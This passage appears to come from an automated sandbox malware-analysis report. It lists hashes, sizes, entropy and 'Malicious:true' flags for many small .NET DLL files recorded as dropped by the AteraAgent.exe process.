                                                                                                                                                                                                                                        SHA-256:48D6284929C1A756E1CA6568E1264F68D364A26D2783FFD102178C3CEE5C3E2F
                                                                                                                                                                                                                                        SHA-512:CFFF96564678592E36034DE8A93B10573D04281811EE475CE2FCBE38B508F196A42C5B27AE9995BFD78100D7B8ACF9B583371384D30B0F55997761F62DB26BB3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8301399451137295
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ELNBEW6pWpNyb8E9VF6IYinAM+oCdT1qe/9:EbMmEpYinAMxCpV
                                                                                                                                                                                                                                        MD5:887B9CC90D56BAEDD52833D1A1F6CD8A
                                                                                                                                                                                                                                        SHA1:208172E072C9BDEF30B09FD3B709F096C62F4EB0
                                                                                                                                                                                                                                        SHA-256:2664564C71CB9325575F6AD8E05E9A6610872B6BD8EE8A5E652CDAA155E9D9A5
                                                                                                                                                                                                                                        SHA-512:2D7B18B8BE784891609A841C9418D2D4D94C48B0FF39DD462D6864BD13DDCEC99BE275F2181D9009562DB5B79681A3244AEBDD31ED49882DC55BEDBE9B71B8EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.886407406057073
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:UKkHKW/tW7Nyb8E9VF6IYinAM+oCkNKuTLO5:ZuMEpYinAMxCWly
                                                                                                                                                                                                                                        MD5:BDE33E56BCFDA5F43F698AA6A9904801
                                                                                                                                                                                                                                        SHA1:C862C96ABCABA6293A559C69359580A499C8FB49
                                                                                                                                                                                                                                        SHA-256:05B3A962728FE408F645C0E346BA2C67C05D580019F46E8EA125F11625492AD4
                                                                                                                                                                                                                                        SHA-512:83D178FEF3FFA4E0E2F12E4D27CC41CD7558D80E866FB6157F6E01D8BFEFFC02AD9E49A60825E185DA1451AD98B3EF715AE56BEB2FD1A7436CE6FCFFB5B1DE40
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.831123937891827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:uLnfIWqrW2Nyb8E9VF6IYinAM+oC7Dq1bsmtw:uDf47EpYinAMxCgbne
                                                                                                                                                                                                                                        MD5:FC6F9DD2EDADE4B03B2C286FF12B08B8
                                                                                                                                                                                                                                        SHA1:881DFD7874EADD9CD9BBB2D00D565C4C4B67DC74
                                                                                                                                                                                                                                        SHA-256:B71BA90138E82175AB84E24BC1D1562B384E42E66211C3AB9E55DE37AE66806E
                                                                                                                                                                                                                                        SHA-512:1AD27E085FA82B2903ADD0A272957922676EA010E7951A263839044A64156ED1FEF0DDDF4BBCB64A90673C46D36CBF8293D4CC95F79DF9042361427798AEC185
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.674385262775769
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:bh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBzX:by9eEpYinAMxCAr
                                                                                                                                                                                                                                        MD5:DD413B5255E4B7837A55CAEB31F2D3B5
                                                                                                                                                                                                                                        SHA1:08A3E4FC618C547BC0C43C14A82751EDD1FE5EAE
                                                                                                                                                                                                                                        SHA-256:25F0B340874F87F64471DCBF1F0C5D55AF3138BA38962428F4E43C8B0AC62FDD
                                                                                                                                                                                                                                        SHA-512:41CC3F323C9BD2B4021C6742145C816D899360FD2D0C34737F8AC59C5ABD5A9CEB940FAD5AB60CF2A82B27F508F59AB87D675031ECE88A9AEFAF422B03A0557F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.814530079881458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:kZhbRtxWl8WK1W5D1Nyby2sE9jBF6IYiYF8pA5K+oCGUHF8x/6DpR3ugz:wna8WK1WTNyb8E9VF6IYinAM+oCY4Nlz
                                                                                                                                                                                                                                        MD5:C10CBA5C00EFECB544EDFD0347F342DA
                                                                                                                                                                                                                                        SHA1:D3D31C92D0D57121BEAB9141CF25B7CEE687837A
                                                                                                                                                                                                                                        SHA-256:B250173E08828C52BC38D0EAA026D1A4DA1B3188D78A00A70C766231551415CC
                                                                                                                                                                                                                                        SHA-512:6E45217D2BA25629A40C428C9F9A96F46EDBBB49AAEC4FB99BEAE7B34F15484DDBE25F117F8576EB6E99CF27BDF4A9A0385A359B8E0674263E8EE9C2B6CECDA9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.765575981977114
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:23ZxCaSWITW5GANyby2sE9jBF6IYiYF8pA5K+oCGUHFjmR6EzqgOr:eBSWITWjNyb8E9VF6IYinAM+oC3mR62A
                                                                                                                                                                                                                                        MD5:59D3A3CDAD08B9FD49D10F1147F0C9F2
                                                                                                                                                                                                                                        SHA1:3BACA7DC1A41DE65DFCD70BCA4AAE653FEDD49AA
                                                                                                                                                                                                                                        SHA-256:9581777360F16E3E7FAA761BE92F9A433B1B4FA2932721D77742830D3ED782E3
                                                                                                                                                                                                                                        SHA-512:77513217DC2E3F177F8B3A51E820D33D9BEDF2CB4D0E101C128ED3942C46460762B6F770AC11CF166872A429DA2A1428AAA12419B8537E24C261CD66224B748E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.874843424486405
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:b88cIIWNoWINyb8E9VF6IYinAM+oCJ7+iB:b9cUeEpYinAMxCQiB
                                                                                                                                                                                                                                        MD5:F6B70B3A89CDD11AD42B8CC1C5545D4C
                                                                                                                                                                                                                                        SHA1:32CE65D07ADD6C3559E254FE6D832AFDCF179947
                                                                                                                                                                                                                                        SHA-256:1513AEC438FEE64607C23AE94F0038C6473B7E7D067742C7ED081B9C59546498
                                                                                                                                                                                                                                        SHA-512:41F76E1E312879FD46D20B2088AF9471BEE791040506F6730AC34B0E5027824EDA3DB883169B2780A42CE147B6C51F0FE820598B264C7A6960D2B1C0BD0D152E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22576
                                                                                                                                                                                                                                        Entropy (8bit):6.619214553486053
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:NkUwx9rm5go1fWKmmW4oqN5dWjaWxNyb8E9VF6IYinAM+oCowXWyVCN:srmoFmWXX5EpYinAMxCb1VCN
                                                                                                                                                                                                                                        MD5:09C9132E894DDC5ED179A5011EE7A321
                                                                                                                                                                                                                                        SHA1:8CC4C0EB42167510E9A09E1DF4D4DA89D9849B1A
                                                                                                                                                                                                                                        SHA-256:9322EF78F8B8A2964BEBEF2B394BAF81F841C32A2B3784A4847F90C05A3D7D70
                                                                                                                                                                                                                                        SHA-512:C781CC33DFC1D58A1C50ABDEA3646988729E13E01E3FF41E5768114AAC2E73FFC78D96DCB1E3B459B2586050367C593455999C47E0C654E835AA5D4D8CECEFFF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18480
                                                                                                                                                                                                                                        Entropy (8bit):6.676903361742476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:C09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVs9:zOAghbsDCyVnVc3p/i2fBVlAO/BRU+pb
                                                                                                                                                                                                                                        MD5:5733180EB9E098285CEE5A61DA3CE521
                                                                                                                                                                                                                                        SHA1:C2642C210299A1658ECF9AD34E78727444AD0737
                                                                                                                                                                                                                                        SHA-256:8C7057258867681EE6D758344DDDEBB90D6158C6391BCDC60BD6F69E43840DBB
                                                                                                                                                                                                                                        SHA-512:7C7103E40AE8D8919C3E38C9E9A9E603BFEFFEFB3B8F3B62E7363C87D54DD1F0872081675F6F2B964C4B83F95F3D9C4B8147B7201678B1B3124E2E8182FA8E7B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.832794165567168
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cvYx4AW6RW524Nyby2sE9jBF6IYiYF8pA5K+oCGUHFt7kRCcmNEa:d7W6RWLNyb8E9VF6IYinAM+oCZ7KmKa
                                                                                                                                                                                                                                        MD5:94E2C828C78B45461F60515EE9F67A0B
                                                                                                                                                                                                                                        SHA1:F7B4FE01F0D15D8A5EDC3FFA5B02969C88D1F189
                                                                                                                                                                                                                                        SHA-256:9FB8C2C852DA4057D918FAEE59C8566539917E4CA3F82DD4BCD7E9E4CD4E26DF
                                                                                                                                                                                                                                        SHA-512:5F7C71B8D8BFE07F8768E97984DA6003008649029B847E073AFD7B634680D7C616F6BBFA57DE81C258D91552984B997D74BCF35C44CB30E26E3FB88F3B07F3CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.923637390083461
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:yI5HeWFwTBsW9Nyb8E9VF6IYinAM+oCuKOyZrWC:yI5HFwTB3EpYinAMxClV7
                                                                                                                                                                                                                                        MD5:33B09F21BE9B7B2D76BE2DD9FDC3188C
                                                                                                                                                                                                                                        SHA1:89DCFF4E98D10BAD8979C542C83B83B40D33ABFB
                                                                                                                                                                                                                                        SHA-256:5B8BFAC3CE90845E121DE2F1271AF56B596E361741FA882626CF900017E850F0
                                                                                                                                                                                                                                        SHA-512:6494B24F192C680FEA9ED2CFA551D515BE391BCB4E149F0FA5607F6A819A0214586ABB376843F70199F08D19C67D8D35411AC6500D5FB51349E10D9AC51D1A38
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.892768295837973
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:5AJpVWbfkBnWdNyb8E9VF6IYinAM+oCn2D:5AJpWfkBEEpYinAMxC8
                                                                                                                                                                                                                                        MD5:1FCB2BF5F5DB0FB5EF27A1A27CAC6839
                                                                                                                                                                                                                                        SHA1:BFC1849448A34162F2B49EE2DB5EB90E61246EF1
                                                                                                                                                                                                                                        SHA-256:1FB75E96E9035269EFA260F0B670ECD5C51C3620B4F0BD221D64F4E5F9A744B5
                                                                                                                                                                                                                                        SHA-512:04D30E22C065D670A959AA426B409B2C9CF4AA177EDC1A2A947117AB63BB09914488694FD0920FDEAD1064185B2A3AF236583B17AD6C5A511707EB3CD5AE66A2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):21040
                                                                                                                                                                                                                                        Entropy (8bit):6.542545481530583
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:w8R71h7yzt94dHWFgQBVWeHWFyTBVWMNyb8E9VF6IYinAM+oCRN0pqZ:x1dyAqgQBfqyTBjEpYinAMxCL
                                                                                                                                                                                                                                        MD5:F061E66A2912461967F8C6D994DB2D42
                                                                                                                                                                                                                                        SHA1:CDCC153E0D7666D2E6B55BD02D959AD2A978C389
                                                                                                                                                                                                                                        SHA-256:9D6C00F7F5567207291611C9196B0B64477CD1293EEF8A00F71709377E7CCFF2
                                                                                                                                                                                                                                        SHA-512:88E0A25783661DCFC01802836B159E74D119DE3642FD63F4ABDE862818E67793AB9E74309A9CF4C78AD693A1A24A22E84D49270C91062899D390947FD5494A4C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18992
                                                                                                                                                                                                                                        Entropy (8bit):6.6833377934930756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:lpsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWUNyb8E9VF6IYinAM+oCZ8oos8:jsPMQMI8COYyi4oBNw4tBEEpYinAMxCM
                                                                                                                                                                                                                                        MD5:3D559EF1A45FB9630B459402AEF6F8B8
                                                                                                                                                                                                                                        SHA1:33F7170DA11336FED87EE675C5CEF6DF451399AB
                                                                                                                                                                                                                                        SHA-256:1B2A1BCF7439BFDD6B636403B9B6CFE9D4BF837A5DD6F311602CCB94DB196E04
                                                                                                                                                                                                                                        SHA-512:884657D217B0887213EE50EF5E4A9FEDB8A4112AB945BD11E86C092F091AAD5CFECC099EE7592BA5497EE4A24B611C6E64A79B5C8D543561B6F02783C5A992B1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):23600
                                                                                                                                                                                                                                        Entropy (8bit):6.319974787771213
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:obhigwLAuZtM66g/Id7WVXWwNyb8E9VF6IYinAM+oCdTLgf:obhzkKs1EpYinAMxCKf
                                                                                                                                                                                                                                        MD5:78B4627C28B942A9F3E3A42B7F2B5CC8
                                                                                                                                                                                                                                        SHA1:67FDCDA750F45F4A8D68EF9FD92096A0CB84CFB4
                                                                                                                                                                                                                                        SHA-256:9511AC4DFB3C3CED151095125D185665B5E38632A6B801A19121264AA2A0C0FE
                                                                                                                                                                                                                                        SHA-512:BCD3079A96D585E3EAFE2071E1D7540326D7C5781CD88A74B09E13C1B0553E0E1D84675722BBC060AFF67EBD356CB17C884EBBCE572A354218A5328558BDB0E4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8703306107292
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:DUcX6W9aWmNyb8E9VF6IYinAM+oC7y5dY:DUchSEpYinAMxCd
                                                                                                                                                                                                                                        MD5:314D0F60DF6AEDD8C51385987552AC01
                                                                                                                                                                                                                                        SHA1:1D41480C364F35570E55B2FE99D2CCF9AE8DECC0
                                                                                                                                                                                                                                        SHA-256:EBD0B986AFB5891FD1BA4F96AD1A398A3CF73E4626DCDF7A342C7B77008719AF
                                                                                                                                                                                                                                        SHA-512:FD213E8653B0D43E3BB7B4522CAEF1EB2CB72CA15DF1606E1CB2AAB38F290F2C75653DD3E863F78036C32FB1D2EBEEAFC946E2B5AA0B7F640EEAF8904476FBD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):41008
                                                                                                                                                                                                                                        Entropy (8bit):5.951902601332249
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:NoBj7kS+8mjvHTeaWKs0Sd4eerEpYinAMxCrn:wPmb9WKs0PeeE7Hxgn
                                                                                                                                                                                                                                        MD5:F70417027E49DF72A70BCB33DA7E7B28
                                                                                                                                                                                                                                        SHA1:41D25C11377565055C1B193E3BD7F9FA82463A8B
                                                                                                                                                                                                                                        SHA-256:0D3EB5856AA09AF984D251AE6813D79D796E8950B1983E0403E2FC4E837300E3
                                                                                                                                                                                                                                        SHA-512:8966A0987612A52033E08B81B7C626EE4C45F3778480B571C594E81C412964513C8CC25EBB48AFF7F4DFED6CC8925EE147F11D66BF385298ACB5044DDDE9753D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.895003478802772
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:CTI2pWPzWKNyb8E9VF6IYinAM+oCWxypY1:CE3bEpYinAMxCppY
                                                                                                                                                                                                                                        MD5:8318C53B5520AB63B90855464DD9A577
                                                                                                                                                                                                                                        SHA1:E26617567FE2BBD5D20C973206F4F929BB1461FA
                                                                                                                                                                                                                                        SHA-256:A29B0C31E6BBC7E3ABC0A896100E3F239921114F3958FA659711F01E08A7DC2C
                                                                                                                                                                                                                                        SHA-512:257BA6A812503C829B83B487D52D41381A565EEDB16972836E7473B72028A3FEB9ABE4CE5F656CC3071D6EF09BC66781F724A3A398A0EF4494E1F753331EF415
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.913085907758278
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Icezoy4W04WFNyb8E9VF6IYinAM+oCmuXU:IBzoy+DEpYinAMxCPU
                                                                                                                                                                                                                                        MD5:25CE99B51343F73E078818EF39CECAD3
                                                                                                                                                                                                                                        SHA1:A289B2DB50400CED6F3979FDDE0359B434A1C8A3
                                                                                                                                                                                                                                        SHA-256:9D5B4450E4AEE76EFDF5B842B68F2B48CD85AAA6DB3E837F42A1C5EEB0C476C2
                                                                                                                                                                                                                                        SHA-512:0BE989D7160C6A3BC3E81F2BDB50A972583958B7CB98B0CD7BD8DDEA7AAFCF8577B44DFB386DF698C62662D46461E4F3C61955AEB8E4E01BAA748DE40D4E334A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.796865766112091
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cegHWexY+WKpW5ryNyby2sE9jBF6IYiYF8pA5K+oCGUHFjekeSEZ:6H/JWKpWwNyb8E9VF6IYinAM+oCXlEZ
                                                                                                                                                                                                                                        MD5:5C98C3495637D44500977836D8610930
                                                                                                                                                                                                                                        SHA1:8071FE6AF722B3DF2FC27ED3A664FE6D111D111A
                                                                                                                                                                                                                                        SHA-256:158EB08B18B89F37A8DBCD883AF278D64395F5690B0E20E8E53FE90553673D60
                                                                                                                                                                                                                                        SHA-512:4678ED7C2464B839890643175F3BCCE001A31BDF7AE772284B8D034F1C98A38F21DBDC4B5BB6C97847AFD9E9CBA9BB72C6DCF54FA3E35FE4741FFE2336D61001
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16944
                                                                                                                                                                                                                                        Entropy (8bit):6.745064610643482
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ETjbocNsWMhWbNyb8E9VF6IYinAM+oCtLQzmM:oboYy8EpYinAMxCtGJ
                                                                                                                                                                                                                                        MD5:86F97766833A9CD05E5FCDF689FAD7BC
                                                                                                                                                                                                                                        SHA1:38D8C0E1AE4DCA60242A2FA1F0F53D84789C6DCB
                                                                                                                                                                                                                                        SHA-256:4194F13F4B59A01BC371F2D189527B57DDACD30CE5801874D258A043D64C3F26
                                                                                                                                                                                                                                        SHA-512:90F9532D28B3C5D40BF12236C42E82282D4A5036A16EA784EDC0ABA44066D95EC807567352F356F83A618BEDF3EEF61847919CC1F2A3E097AB75D16A7618184F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.843053619438805
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cnfExAJsjWVWhW5W9Nyby2sE9jBF6IYiYF8pA5K+oCGUHFvpHIq8anQcK5:ISKiWIhWCNyb8E9VF6IYinAM+oCLp855
                                                                                                                                                                                                                                        MD5:E57E5571CFD4504E72D174BA5DBEA004
                                                                                                                                                                                                                                        SHA1:A5C9E12D1833450B9BBEA5C21A2C7BB068621731
                                                                                                                                                                                                                                        SHA-256:BDA638D1E444C3F9A4BC4414B7DF4DFC6FA965AF621733147CBD6B4482F33545
                                                                                                                                                                                                                                        SHA-512:8AEB5548AF99E0C67EE44BBAC2A865BD79CB0A6350D7D2A4002814CF8F591E2ED479BD92CA8D37058FC50C56AAEF0A9462D6278891AA010A3FA7DBCF2708FE64
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.7910515765195045
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:K0KbZWApWmWTpWeNyb8E9VF6IYinAM+oCkp8ZzO:tKRylEpYinAMxC3U
                                                                                                                                                                                                                                        MD5:7E0868D263799B242359950875723DE8
                                                                                                                                                                                                                                        SHA1:3576BEEBB1DA20AB3C578ED70C240CE597662E3A
                                                                                                                                                                                                                                        SHA-256:DA130E3183F408D0B24145C1B2095D451BA5F266D08A1BC3305F7BBE88C3BE73
                                                                                                                                                                                                                                        SHA-512:004BEA5E753F3A8C00395E971C254F850CA805E59A671D6A393B4651279EBD4DB3FB0597822E0AFFBB2F1F0A70F807C32B58D092ED0F83A282F93E0FA77D4080
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.878184697843205
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cz+xx8u2SWCXW53JNyby2sE9jBF6IYiYF8pA5K+oCGUHFTY3rDS38:3b1nWCXWzNyb8E9VF6IYinAM+oCnY3C8
                                                                                                                                                                                                                                        MD5:54DECB83A83722723EA3C9EE1D507049
                                                                                                                                                                                                                                        SHA1:E3849BA70B6066D39255A42A699BFA92BA44580A
                                                                                                                                                                                                                                        SHA-256:B84D56CA7C9FFBF1DEE16BEB81F34505EA8040024ADAB90A31F5BB672EFBACFD
